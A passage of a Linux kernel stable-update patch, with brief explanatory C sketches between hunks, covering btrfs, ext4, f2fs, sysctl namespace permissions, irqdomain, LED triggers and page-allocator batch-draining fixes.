+ 		} else if (btrfs_is_zoned(fs_info)) {
+ 			/* Need reset before reusing in a zoned block group */
+-			space_info->bytes_zone_unusable += len;
++			btrfs_space_info_update_bytes_zone_unusable(fs_info, space_info,
++								    len);
+ 			readonly = true;
+ 		}
+ 		spin_unlock(&cache->lock);
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 862a222caab33..76d52d682b3b0 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2702,8 +2702,10 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	 * If the block group is read-only, we should account freed space into
+ 	 * bytes_readonly.
+ 	 */
+-	if (!block_group->ro)
++	if (!block_group->ro) {
+ 		block_group->zone_unusable += to_unusable;
++		WARN_ON(block_group->zone_unusable > block_group->length);
++	}
+ 	spin_unlock(&ctl->tree_lock);
+ 	if (!used) {
+ 		spin_lock(&block_group->lock);
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 8b75f436a9a3c..bede72f3dffc3 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -311,7 +311,7 @@ void btrfs_add_bg_to_space_info(struct btrfs_fs_info *info,
+ 	found->bytes_used += block_group->used;
+ 	found->disk_used += block_group->used * factor;
+ 	found->bytes_readonly += block_group->bytes_super;
+-	found->bytes_zone_unusable += block_group->zone_unusable;
++	btrfs_space_info_update_bytes_zone_unusable(info, found, block_group->zone_unusable);
+ 	if (block_group->length > 0)
+ 		found->full = 0;
+ 	btrfs_try_granting_tickets(info, found);
+diff --git a/fs/btrfs/space-info.h b/fs/btrfs/space-info.h
+index ce66023a9eb8b..99ce3225dd59d 100644
+--- a/fs/btrfs/space-info.h
++++ b/fs/btrfs/space-info.h
+@@ -121,6 +121,7 @@ btrfs_space_info_update_##name(struct btrfs_fs_info *fs_info,		\
+ 
+ DECLARE_SPACE_INFO_UPDATE(bytes_may_use, "space_info");
+ DECLARE_SPACE_INFO_UPDATE(bytes_pinned, "pinned");
++DECLARE_SPACE_INFO_UPDATE(bytes_zone_unusable, "zone_unusable");
+ 
+ int btrfs_init_space_info(struct btrfs_fs_info *fs_info);
+ void btrfs_add_bg_to_space_info(struct btrfs_fs_info *info,
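
DECLARE_SPACE_INFO_UPDATE presumably generates an updater that applies the diff to the named counter and fires the matching update_bytes_* tracepoint, which is why the hunks above route bytes_zone_unusable through it instead of open-coded arithmetic. A hedged sketch of how such a declaration could expand, with printf standing in for the tracepoint:

#include <stdio.h>

/* Hedged sketch only: assumes the macro pairs the arithmetic with a
 * trace hook; printf stands in for the real update_bytes_* event. */
struct space_info {
        long bytes_zone_unusable;
};

#define DECLARE_SPACE_INFO_UPDATE(name, tracename)                     \
static void update_##name(struct space_info *s, long diff)             \
{                                                                      \
        printf("trace %s: old=%ld diff=%ld\n", tracename,              \
               s->name, diff);                                         \
        s->name += diff;                                               \
}

DECLARE_SPACE_INFO_UPDATE(bytes_zone_unusable, "zone_unusable")

int main(void)
{
        struct space_info si = { 0 };

        update_bytes_zone_unusable(&si, 4096);
        update_bytes_zone_unusable(&si, -4096);
        return 0;
}
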
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 67af684e44e6e..5cbe5ae5ad4a2 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -3113,8 +3113,9 @@ static int ext4_zeroout_es(struct inode *inode, struct ext4_extent *ex)
+ 	if (ee_len == 0)
+ 		return 0;
+ 
+-	return ext4_es_insert_extent(inode, ee_block, ee_len, ee_pblock,
+-				     EXTENT_STATUS_WRITTEN);
++	ext4_es_insert_extent(inode, ee_block, ee_len, ee_pblock,
++			      EXTENT_STATUS_WRITTEN);
++	return 0;
+ }
+ 
+ /* FIXME!! we need to try to merge to left or right after zero-out  */
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 9766d3b21ca2e..592229027af72 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -847,12 +847,10 @@ static int __es_insert_extent(struct inode *inode, struct extent_status *newes,
+ /*
+  * ext4_es_insert_extent() adds information to an inode's extent
+  * status tree.
+- *
+- * Return 0 on success, error code on failure.
+  */
+-int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+-			  ext4_lblk_t len, ext4_fsblk_t pblk,
+-			  unsigned int status)
++void ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
++			   ext4_lblk_t len, ext4_fsblk_t pblk,
++			   unsigned int status)
+ {
+ 	struct extent_status newes;
+ 	ext4_lblk_t end = lblk + len - 1;
+@@ -864,13 +862,13 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	bool revise_pending = false;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+-		return 0;
++		return;
+ 
+ 	es_debug("add [%u/%u) %llu %x to extent status tree of inode %lu\n",
+ 		 lblk, len, pblk, status, inode->i_ino);
+ 
+ 	if (!len)
+-		return 0;
++		return;
+ 
+ 	BUG_ON(end < lblk);
+ 
+@@ -939,7 +937,7 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ 		goto retry;
+ 
+ 	ext4_es_print_tree(inode);
+-	return 0;
++	return;
+ }
+ 
+ /*
+diff --git a/fs/ext4/extents_status.h b/fs/ext4/extents_status.h
+index 4ec30a7982605..481ec4381bee6 100644
+--- a/fs/ext4/extents_status.h
++++ b/fs/ext4/extents_status.h
+@@ -127,9 +127,9 @@ extern int __init ext4_init_es(void);
+ extern void ext4_exit_es(void);
+ extern void ext4_es_init_tree(struct ext4_es_tree *tree);
+ 
+-extern int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+-				 ext4_lblk_t len, ext4_fsblk_t pblk,
+-				 unsigned int status);
++extern void ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
++				  ext4_lblk_t len, ext4_fsblk_t pblk,
++				  unsigned int status);
+ extern void ext4_es_cache_extent(struct inode *inode, ext4_lblk_t lblk,
+ 				 ext4_lblk_t len, ext4_fsblk_t pblk,
+ 				 unsigned int status);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 2479508deab3b..93a1c22048de6 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -481,6 +481,35 @@ static void ext4_map_blocks_es_recheck(handle_t *handle,
+ }
+ #endif /* ES_AGGRESSIVE_TEST */
+ 
++static int ext4_map_query_blocks(handle_t *handle, struct inode *inode,
++				 struct ext4_map_blocks *map)
++{
++	unsigned int status;
++	int retval;
++
++	if (ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS))
++		retval = ext4_ext_map_blocks(handle, inode, map, 0);
++	else
++		retval = ext4_ind_map_blocks(handle, inode, map, 0);
++
++	if (retval <= 0)
++		return retval;
++
++	if (unlikely(retval != map->m_len)) {
++		ext4_warning(inode->i_sb,
++			     "ES len assertion failed for inode "
++			     "%lu: retval %d != map->m_len %d",
++			     inode->i_ino, retval, map->m_len);
++		WARN_ON(1);
++	}
++
++	status = map->m_flags & EXT4_MAP_UNWRITTEN ?
++			EXTENT_STATUS_UNWRITTEN : EXTENT_STATUS_WRITTEN;
++	ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
++			      map->m_pblk, status);
++	return retval;
++}
++
+ /*
+  * The ext4_map_blocks() function tries to look up the requested blocks,
+  * and returns if the blocks are already mapped.
+@@ -595,10 +624,8 @@ int ext4_map_blocks(handle_t *handle, struct inode *inode,
+ 		    ext4_es_scan_range(inode, &ext4_es_is_delayed, map->m_lblk,
+ 				       map->m_lblk + map->m_len - 1))
+ 			status |= EXTENT_STATUS_DELAYED;
+-		ret = ext4_es_insert_extent(inode, map->m_lblk,
+-					    map->m_len, map->m_pblk, status);
+-		if (ret < 0)
+-			retval = ret;
++		ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
++				      map->m_pblk, status);
+ 	}
+ 	up_read((&EXT4_I(inode)->i_data_sem));
+ 
+@@ -707,12 +734,8 @@ int ext4_map_blocks(handle_t *handle, struct inode *inode,
+ 		    ext4_es_scan_range(inode, &ext4_es_is_delayed, map->m_lblk,
+ 				       map->m_lblk + map->m_len - 1))
+ 			status |= EXTENT_STATUS_DELAYED;
+-		ret = ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
+-					    map->m_pblk, status);
+-		if (ret < 0) {
+-			retval = ret;
+-			goto out_sem;
+-		}
++		ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
++				      map->m_pblk, status);
+ 	}
+ 
+ out_sem:
+@@ -1746,12 +1769,10 @@ static int ext4_da_map_blocks(struct inode *inode, sector_t iblock,
+ 
+ 	/* Lookup extent status tree firstly */
+ 	if (ext4_es_lookup_extent(inode, iblock, NULL, &es)) {
+-		if (ext4_es_is_hole(&es)) {
+-			retval = 0;
+-			down_read(&EXT4_I(inode)->i_data_sem);
++		if (ext4_es_is_hole(&es))
+ 			goto add_delayed;
+-		}
+ 
++found:
+ 		/*
+ 		 * Delayed extent could be allocated by fallocate.
+ 		 * So we need to check it.
+@@ -1788,52 +1809,42 @@ static int ext4_da_map_blocks(struct inode *inode, sector_t iblock,
+ 	down_read(&EXT4_I(inode)->i_data_sem);
+ 	if (ext4_has_inline_data(inode))
+ 		retval = 0;
+-	else if (ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS))
+-		retval = ext4_ext_map_blocks(NULL, inode, map, 0);
+ 	else
+-		retval = ext4_ind_map_blocks(NULL, inode, map, 0);
++		retval = ext4_map_query_blocks(NULL, inode, map);
++	up_read(&EXT4_I(inode)->i_data_sem);
++	if (retval)
++		return retval;
+ 
+ add_delayed:
+-	if (retval == 0) {
+-		int ret;
+-
+-		/*
+-		 * XXX: __block_prepare_write() unmaps passed block,
+-		 * is it OK?
+-		 */
+-
+-		ret = ext4_insert_delayed_block(inode, map->m_lblk);
+-		if (ret != 0) {
+-			retval = ret;
+-			goto out_unlock;
++	down_write(&EXT4_I(inode)->i_data_sem);
++	/*
++	 * Page fault path (ext4_page_mkwrite does not take i_rwsem)
++	 * and fallocate path (no folio lock) can race. Make sure we
++	 * lookup the extent status tree here again while i_data_sem
++	 * is held in write mode, before inserting a new da entry in
++	 * the extent status tree.
++	 */
++	if (ext4_es_lookup_extent(inode, iblock, NULL, &es)) {
++		if (!ext4_es_is_hole(&es)) {
++			up_write(&EXT4_I(inode)->i_data_sem);
++			goto found;
+ 		}
+-
+-		map_bh(bh, inode->i_sb, invalid_block);
+-		set_buffer_new(bh);
+-		set_buffer_delay(bh);
+-	} else if (retval > 0) {
+-		int ret;
+-		unsigned int status;
+-
+-		if (unlikely(retval != map->m_len)) {
+-			ext4_warning(inode->i_sb,
+-				     "ES len assertion failed for inode "
+-				     "%lu: retval %d != map->m_len %d",
+-				     inode->i_ino, retval, map->m_len);
+-			WARN_ON(1);
++	} else if (!ext4_has_inline_data(inode)) {
++		retval = ext4_map_query_blocks(NULL, inode, map);
++		if (retval) {
++			up_write(&EXT4_I(inode)->i_data_sem);
++			return retval;
+ 		}
+-
+-		status = map->m_flags & EXT4_MAP_UNWRITTEN ?
+-				EXTENT_STATUS_UNWRITTEN : EXTENT_STATUS_WRITTEN;
+-		ret = ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
+-					    map->m_pblk, status);
+-		if (ret != 0)
+-			retval = ret;
+ 	}
+ 
+-out_unlock:
+-	up_read((&EXT4_I(inode)->i_data_sem));
++	retval = ext4_insert_delayed_block(inode, map->m_lblk);
++	up_write(&EXT4_I(inode)->i_data_sem);
++	if (retval)
++		return retval;
+ 
++	map_bh(bh, inode->i_sb, invalid_block);
++	set_buffer_new(bh);
++	set_buffer_delay(bh);
+ 	return retval;
+ }
+ 
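
The comment in the ext4_da_map_blocks hunk describes the classic lookup/drop/retake pattern: a hit under the read lock is trusted, but after taking the write lock the tree must be probed again before inserting, since a racing path may have inserted in the window. A minimal sketch of the pattern with a pthread rwlock; es_lookup and es_insert are simplified stand-ins, not the ext4 extent-status functions.

#include <pthread.h>
#include <stdbool.h>

/* Stand-ins for the extent-status tree operations, not ext4 code. */
static pthread_rwlock_t sem = PTHREAD_RWLOCK_INITIALIZER;
static bool present;

static bool es_lookup(void) { return present; }
static void es_insert(void) { present = true; }

static void map_block(void)
{
        pthread_rwlock_rdlock(&sem);
        bool hit = es_lookup();
        pthread_rwlock_unlock(&sem);
        if (hit)
                return;

        pthread_rwlock_wrlock(&sem);
        /* a racing inserter may have won between unlock and wrlock,
         * so probe again before inserting */
        if (!es_lookup())
                es_insert();
        pthread_rwlock_unlock(&sem);
}

int main(void)
{
        map_block();
        return 0;
}
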
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index e19b569d938d8..1264a350d4d75 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -3185,7 +3185,9 @@ static int __get_segment_type_6(struct f2fs_io_info *fio)
+ 		if (page_private_gcing(fio->page)) {
+ 			if (fio->sbi->am.atgc_enabled &&
+ 				(fio->io_type == FS_DATA_IO) &&
+-				(fio->sbi->gc_mode != GC_URGENT_HIGH))
++				(fio->sbi->gc_mode != GC_URGENT_HIGH) &&
++				__is_valid_data_blkaddr(fio->old_blkaddr) &&
++				!is_inode_flag_set(inode, FI_OPU_WRITE))
+ 				return CURSEG_ALL_DATA_ATGC;
+ 			else
+ 				return CURSEG_COLD_DATA;
+diff --git a/fs/file.c b/fs/file.c
+index 69386c2e37c50..82c5d23820820 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -1122,6 +1122,7 @@ __releases(&files->file_lock)
+ 	 * tables and this condition does not arise without those.
+ 	 */
+ 	fdt = files_fdtable(files);
++	fd = array_index_nospec(fd, fdt->max_fds);
+ 	tofree = fdt->fd[fd];
+ 	if (!tofree && fd_is_open(fd, fdt))
+ 		goto Ebusy;
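
The fs/file.c one-liner is a Spectre-v1 hardening: array_index_nospec() clamps fd before the dependent load so a mispredicted bounds check cannot speculatively read past the fd table. A rough userspace analogue of the clamp, simplified relative to the arch-tuned kernel macro:

#include <stddef.h>
#include <stdio.h>

/* Simplified analogue of array_index_nospec(); the kernel builds the
 * mask with arch-specific branch-free arithmetic. */
static size_t index_nospec(size_t idx, size_t size)
{
        size_t mask = (size_t)0 - (idx < size); /* all-ones iff in range */

        return idx & mask;      /* out-of-range indexes clamp to 0 */
}

int main(void)
{
        int fd_table[4] = { 10, 11, 12, 13 };

        printf("%d\n", fd_table[index_nospec(2, 4)]);   /* 12 */
        printf("%d\n", fd_table[index_nospec(9, 4)]);   /* 10, clamped */
        return 0;
}
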
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 4a4c04a3b1a0a..df77a7bcce498 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -483,12 +483,10 @@ static struct inode *proc_sys_make_inode(struct super_block *sb,
+ 			make_empty_dir_inode(inode);
+ 	}
+ 
++	inode->i_uid = GLOBAL_ROOT_UID;
++	inode->i_gid = GLOBAL_ROOT_GID;
+ 	if (root->set_ownership)
+-		root->set_ownership(head, table, &inode->i_uid, &inode->i_gid);
+-	else {
+-		inode->i_uid = GLOBAL_ROOT_UID;
+-		inode->i_gid = GLOBAL_ROOT_GID;
+-	}
++		root->set_ownership(head, &inode->i_uid, &inode->i_gid);
+ 
+ 	return inode;
+ }
+diff --git a/include/linux/leds.h b/include/linux/leds.h
+index ba4861ec73d30..79ab2dfd3c72f 100644
+--- a/include/linux/leds.h
++++ b/include/linux/leds.h
+@@ -356,6 +356,9 @@ struct led_trigger {
+ 	int		(*activate)(struct led_classdev *led_cdev);
+ 	void		(*deactivate)(struct led_classdev *led_cdev);
+ 
++	/* Brightness set by led_trigger_event */
++	enum led_brightness brightness;
++
+ 	/* LED-private triggers have this set */
+ 	struct led_hw_trigger_type *trigger_type;
+ 
+@@ -409,22 +412,11 @@ static inline void *led_get_trigger_data(struct led_classdev *led_cdev)
+ 	return led_cdev->trigger_data;
+ }
+ 
+-/**
+- * led_trigger_rename_static - rename a trigger
+- * @name: the new trigger name
+- * @trig: the LED trigger to rename
+- *
+- * Change a LED trigger name by copying the string passed in
+- * name into current trigger name, which MUST be large
+- * enough for the new string.
+- *
+- * Note that name must NOT point to the same string used
+- * during LED registration, as that could lead to races.
+- *
+- * This is meant to be used on triggers with statically
+- * allocated name.
+- */
+-void led_trigger_rename_static(const char *name, struct led_trigger *trig);
++static inline enum led_brightness
++led_trigger_get_brightness(const struct led_trigger *trigger)
++{
++	return trigger ? trigger->brightness : LED_OFF;
++}
+ 
+ #define module_led_trigger(__led_trigger) \
+ 	module_driver(__led_trigger, led_trigger_register, \
+@@ -462,6 +454,12 @@ static inline void *led_get_trigger_data(struct led_classdev *led_cdev)
+ 	return NULL;
+ }
+ 
++static inline enum led_brightness
++led_trigger_get_brightness(const struct led_trigger *trigger)
++{
++	return LED_OFF;
++}
++
+ #endif /* CONFIG_LEDS_TRIGGERS */
+ 
+ /* Trigger specific functions */
+diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
+index a207c7ed41bd2..9f24feb94b24d 100644
+--- a/include/linux/sysctl.h
++++ b/include/linux/sysctl.h
+@@ -185,7 +185,6 @@ struct ctl_table_root {
+ 	struct ctl_table_set default_set;
+ 	struct ctl_table_set *(*lookup)(struct ctl_table_root *root);
+ 	void (*set_ownership)(struct ctl_table_header *head,
+-			      struct ctl_table *table,
+ 			      kuid_t *uid, kgid_t *gid);
+ 	int (*permissions)(struct ctl_table_header *head, struct ctl_table *table);
+ };
+diff --git a/include/trace/events/btrfs.h b/include/trace/events/btrfs.h
+index 5e10b5b1d16c0..7a6c5a870d33c 100644
+--- a/include/trace/events/btrfs.h
++++ b/include/trace/events/btrfs.h
+@@ -2322,6 +2322,14 @@ DEFINE_EVENT(btrfs__space_info_update, update_bytes_pinned,
+ 	TP_ARGS(fs_info, sinfo, old, diff)
+ );
+ 
++DEFINE_EVENT(btrfs__space_info_update, update_bytes_zone_unusable,
++
++	TP_PROTO(const struct btrfs_fs_info *fs_info,
++		 const struct btrfs_space_info *sinfo, u64 old, s64 diff),
++
++	TP_ARGS(fs_info, sinfo, old, diff)
++);
++
+ DECLARE_EVENT_CLASS(btrfs_raid56_bio,
+ 
+ 	TP_PROTO(const struct btrfs_raid_bio *rbio,
+diff --git a/include/trace/events/mptcp.h b/include/trace/events/mptcp.h
+index 563e48617374d..54e8fb5a229cd 100644
+--- a/include/trace/events/mptcp.h
++++ b/include/trace/events/mptcp.h
+@@ -34,7 +34,7 @@ TRACE_EVENT(mptcp_subflow_get_send,
+ 		struct sock *ssk;
+ 
+ 		__entry->active = mptcp_subflow_active(subflow);
+-		__entry->backup = subflow->backup;
++		__entry->backup = subflow->backup || subflow->request_bkup;
+ 
+ 		if (subflow->tcp_sock && sk_fullsock(subflow->tcp_sock))
+ 			__entry->free = sk_stream_memory_free(subflow->tcp_sock);
+diff --git a/init/Kconfig b/init/Kconfig
+index 537f01eba2e6f..4cd3fc82b09e5 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1924,6 +1924,7 @@ config RUST
+ 	depends on !MODVERSIONS
+ 	depends on !GCC_PLUGINS
+ 	depends on !RANDSTRUCT
++	depends on !SHADOW_CALL_STACK
+ 	depends on !DEBUG_INFO_BTF || PAHOLE_HAS_LANG_EXCLUDE
+ 	help
+ 	  Enables Rust support in the kernel.
+diff --git a/ipc/ipc_sysctl.c b/ipc/ipc_sysctl.c
+index ef313ecfb53a1..d7ca2bdae9e82 100644
+--- a/ipc/ipc_sysctl.c
++++ b/ipc/ipc_sysctl.c
+@@ -14,6 +14,7 @@
+ #include <linux/ipc_namespace.h>
+ #include <linux/msg.h>
+ #include <linux/slab.h>
++#include <linux/cred.h>
+ #include "util.h"
+ 
+ static int proc_ipc_dointvec_minmax_orphans(struct ctl_table *table, int write,
+@@ -190,25 +191,56 @@ static int set_is_seen(struct ctl_table_set *set)
+ 	return &current->nsproxy->ipc_ns->ipc_set == set;
+ }
+ 
++static void ipc_set_ownership(struct ctl_table_header *head,
++			      kuid_t *uid, kgid_t *gid)
++{
++	struct ipc_namespace *ns =
++		container_of(head->set, struct ipc_namespace, ipc_set);
++
++	kuid_t ns_root_uid = make_kuid(ns->user_ns, 0);
++	kgid_t ns_root_gid = make_kgid(ns->user_ns, 0);
++
++	*uid = uid_valid(ns_root_uid) ? ns_root_uid : GLOBAL_ROOT_UID;
++	*gid = gid_valid(ns_root_gid) ? ns_root_gid : GLOBAL_ROOT_GID;
++}
++
+ static int ipc_permissions(struct ctl_table_header *head, struct ctl_table *table)
+ {
+ 	int mode = table->mode;
+ 
+ #ifdef CONFIG_CHECKPOINT_RESTORE
+-	struct ipc_namespace *ns = current->nsproxy->ipc_ns;
++	struct ipc_namespace *ns =
++		container_of(head->set, struct ipc_namespace, ipc_set);
+ 
+ 	if (((table->data == &ns->ids[IPC_SEM_IDS].next_id) ||
+ 	     (table->data == &ns->ids[IPC_MSG_IDS].next_id) ||
+ 	     (table->data == &ns->ids[IPC_SHM_IDS].next_id)) &&
+ 	    checkpoint_restore_ns_capable(ns->user_ns))
+ 		mode = 0666;
++	else
+ #endif
+-	return mode;
++	{
++		kuid_t ns_root_uid;
++		kgid_t ns_root_gid;
++
++		ipc_set_ownership(head, &ns_root_uid, &ns_root_gid);
++
++		if (uid_eq(current_euid(), ns_root_uid))
++			mode >>= 6;
++
++		else if (in_egroup_p(ns_root_gid))
++			mode >>= 3;
++	}
++
++	mode &= 7;
++
++	return (mode << 6) | (mode << 3) | mode;
+ }
+ 
+ static struct ctl_table_root set_root = {
+ 	.lookup = set_lookup,
+ 	.permissions = ipc_permissions,
++	.set_ownership = ipc_set_ownership,
+ };
+ 
+ bool setup_ipc_sysctls(struct ipc_namespace *ns)
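
The folded return value in ipc_permissions() works in two steps: pick the rwx triad that applies to the caller (owner bits for the namespace's mapped root uid, group bits for its gid, world bits otherwise), then replicate that triad into all three positions so whichever slot the generic permission check consults grants the same rights. A small sketch of the arithmetic, with the uid/gid comparisons reduced to booleans:

#include <stdio.h>

/* Sketch only: the kernel compares current_euid()/in_egroup_p()
 * against the namespace's mapped root uid/gid; here they are flags. */
static int fold_mode(int mode, int is_ns_root_uid, int in_ns_root_gid)
{
        if (is_ns_root_uid)
                mode >>= 6;             /* owner triad applies */
        else if (in_ns_root_gid)
                mode >>= 3;             /* group triad applies */
        mode &= 7;

        /* replicate the chosen triad so any slot the generic check
         * consults (owner, group or other) grants the same rights */
        return (mode << 6) | (mode << 3) | mode;
}

int main(void)
{
        printf("%03o\n", fold_mode(0644, 1, 0));        /* 666 */
        printf("%03o\n", fold_mode(0644, 0, 0));        /* 444 */
        return 0;
}
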
+diff --git a/ipc/mq_sysctl.c b/ipc/mq_sysctl.c
+index fbf6a8b93a265..c960691fc24d9 100644
+--- a/ipc/mq_sysctl.c
++++ b/ipc/mq_sysctl.c
+@@ -12,6 +12,7 @@
+ #include <linux/stat.h>
+ #include <linux/capability.h>
+ #include <linux/slab.h>
++#include <linux/cred.h>
+ 
+ static int msg_max_limit_min = MIN_MSGMAX;
+ static int msg_max_limit_max = HARD_MSGMAX;
+@@ -76,8 +77,42 @@ static int set_is_seen(struct ctl_table_set *set)
+ 	return &current->nsproxy->ipc_ns->mq_set == set;
+ }
+ 
++static void mq_set_ownership(struct ctl_table_header *head,
++			     kuid_t *uid, kgid_t *gid)
++{
++	struct ipc_namespace *ns =
++		container_of(head->set, struct ipc_namespace, mq_set);
++
++	kuid_t ns_root_uid = make_kuid(ns->user_ns, 0);
++	kgid_t ns_root_gid = make_kgid(ns->user_ns, 0);
++
++	*uid = uid_valid(ns_root_uid) ? ns_root_uid : GLOBAL_ROOT_UID;
++	*gid = gid_valid(ns_root_gid) ? ns_root_gid : GLOBAL_ROOT_GID;
++}
++
++static int mq_permissions(struct ctl_table_header *head, struct ctl_table *table)
++{
++	int mode = table->mode;
++	kuid_t ns_root_uid;
++	kgid_t ns_root_gid;
++
++	mq_set_ownership(head, &ns_root_uid, &ns_root_gid);
++
++	if (uid_eq(current_euid(), ns_root_uid))
++		mode >>= 6;
++
++	else if (in_egroup_p(ns_root_gid))
++		mode >>= 3;
++
++	mode &= 7;
++
++	return (mode << 6) | (mode << 3) | mode;
++}
++
+ static struct ctl_table_root set_root = {
+ 	.lookup = set_lookup,
++	.permissions = mq_permissions,
++	.set_ownership = mq_set_ownership,
+ };
+ 
+ bool setup_mq_sysctls(struct ipc_namespace *ns)
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index 607c0c3d3f5e1..6aea9d25ab9ac 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -154,7 +154,6 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 		switch (fwid->type) {
+ 		case IRQCHIP_FWNODE_NAMED:
+ 		case IRQCHIP_FWNODE_NAMED_ID:
+-			domain->fwnode = fwnode;
+ 			domain->name = kstrdup(fwid->name, GFP_KERNEL);
+ 			if (!domain->name) {
+ 				kfree(domain);
+@@ -163,7 +162,6 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 			domain->flags |= IRQ_DOMAIN_NAME_ALLOCATED;
+ 			break;
+ 		default:
+-			domain->fwnode = fwnode;
+ 			domain->name = fwid->name;
+ 			break;
+ 		}
+@@ -185,7 +183,6 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 		strreplace(name, '/', ':');
+ 
+ 		domain->name = name;
+-		domain->fwnode = fwnode;
+ 		domain->flags |= IRQ_DOMAIN_NAME_ALLOCATED;
+ 	}
+ 
+@@ -201,8 +198,8 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 		domain->flags |= IRQ_DOMAIN_NAME_ALLOCATED;
+ 	}
+ 
+-	fwnode_handle_get(fwnode);
+-	fwnode_dev_initialized(fwnode, true);
++	domain->fwnode = fwnode_handle_get(fwnode);
++	fwnode_dev_initialized(domain->fwnode, true);
+ 
+ 	/* Fill structure */
+ 	INIT_RADIX_TREE(&domain->revmap_tree, GFP_KERNEL);
+diff --git a/mm/Kconfig b/mm/Kconfig
+index 35109a4a2f7ce..a65145fe89f2b 100644
+--- a/mm/Kconfig
++++ b/mm/Kconfig
+@@ -627,6 +627,17 @@ config HUGETLB_PAGE_SIZE_VARIABLE
+ config CONTIG_ALLOC
+ 	def_bool (MEMORY_ISOLATION && COMPACTION) || CMA
+ 
++config PCP_BATCH_SCALE_MAX
++	int "Maximum scale factor of PCP (Per-CPU pageset) batch allocate/free"
++	default 5
++	range 0 6
++	help
++	  In page allocator, PCP (Per-CPU pageset) is refilled and drained in
++	  batches.  The batch number is scaled automatically to improve page
++	  allocation/free throughput.  But too large scale factor may hurt
++	  latency.  This option sets the upper limit of scale factor to limit
++	  the maximum latency.
++
+ config PHYS_ADDR_T_64BIT
+ 	def_bool 64BIT
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 12412263d131e..a905b850d31c4 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -3176,14 +3176,21 @@ void drain_zone_pages(struct zone *zone, struct per_cpu_pages *pcp)
+  */
+ static void drain_pages_zone(unsigned int cpu, struct zone *zone)
+ {
+-	struct per_cpu_pages *pcp;
++	struct per_cpu_pages *pcp = per_cpu_ptr(zone->per_cpu_pageset, cpu);
++	int count;
+ 
+-	pcp = per_cpu_ptr(zone->per_cpu_pageset, cpu);
+-	if (pcp->count) {
++	do {
+ 		spin_lock(&pcp->lock);
+-		free_pcppages_bulk(zone, pcp->count, pcp, 0);
++		count = pcp->count;
++		if (count) {
++			int to_drain = min(count,
++				pcp->batch << CONFIG_PCP_BATCH_SCALE_MAX);
++
++			free_pcppages_bulk(zone, to_drain, pcp, 0);
++			count -= to_drain;
++		}
+ 		spin_unlock(&pcp->lock);
+-	}
++	} while (count);
+ }
+ 
+ /*
+@@ -3389,7 +3396,7 @@ static int nr_pcp_free(struct per_cpu_pages *pcp, int high, int batch,
+ 	 * freeing of pages without any allocation.
+ 	 */
+ 	batch <<= pcp->free_factor;
+-	if (batch < max_nr_free)
++	if (batch < max_nr_free && pcp->free_factor < CONFIG_PCP_BATCH_SCALE_MAX)
+ 		pcp->free_factor++;
+ 	batch = clamp(batch, min_nr_free, max_nr_free);
+ 
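
Both page_alloc.c hunks bound PCP work by batch << CONFIG_PCP_BATCH_SCALE_MAX: the drain loop frees at most that many pages per lock hold and re-takes the lock until the list is empty, trading a little throughput for bounded lock-hold latency. A sketch of the loop shape, with the pcp lock and the real free path elided:

#include <stdio.h>

#define BATCH_SCALE_MAX 5       /* mirrors CONFIG_PCP_BATCH_SCALE_MAX */

/* Sketch only: locking and the actual page-freeing are elided. */
static void drain_pages(int *count, int batch)
{
        int remaining = *count;

        do {
                /* lock(pcp) */
                int cap = batch << BATCH_SCALE_MAX;
                int to_drain = remaining < cap ? remaining : cap;

                remaining -= to_drain;  /* free_pcppages_bulk() analogue */
                /* unlock(pcp): other CPUs can take the lock here */
        } while (remaining);
        *count = 0;
}

int main(void)
{
        int count = 10000;

        drain_pages(&count, 63);
        printf("%d\n", count);  /* 0 */
        return 0;
}
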
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 57302021b7ebb..320fc1e6dff2a 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2837,6 +2837,27 @@ static int hci_passive_scan_sync(struct hci_dev *hdev)
+ 	 */
